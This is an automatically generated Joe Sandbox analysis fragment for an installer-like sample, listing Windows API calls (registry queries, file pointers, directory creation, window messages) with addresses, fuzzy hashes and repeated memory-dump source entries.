                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3449924974-0
                                                                                      • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                      • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                      • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                      • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 004032F2
                                                                                        • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                      • SetFilePointer.KERNELBASE(00178261,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer$CountTick
                                                                                      • String ID:
                                                                                      • API String ID: 1092082344-0
                                                                                      • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                      • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                      • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                      • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                      • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                      • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                      • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                      • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                      • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                      • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                      APIs
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID:
                                                                                      • API String ID: 1892508949-0
                                                                                      • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                      • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                      • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                      • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                      • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                      • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                      • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                      APIs
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
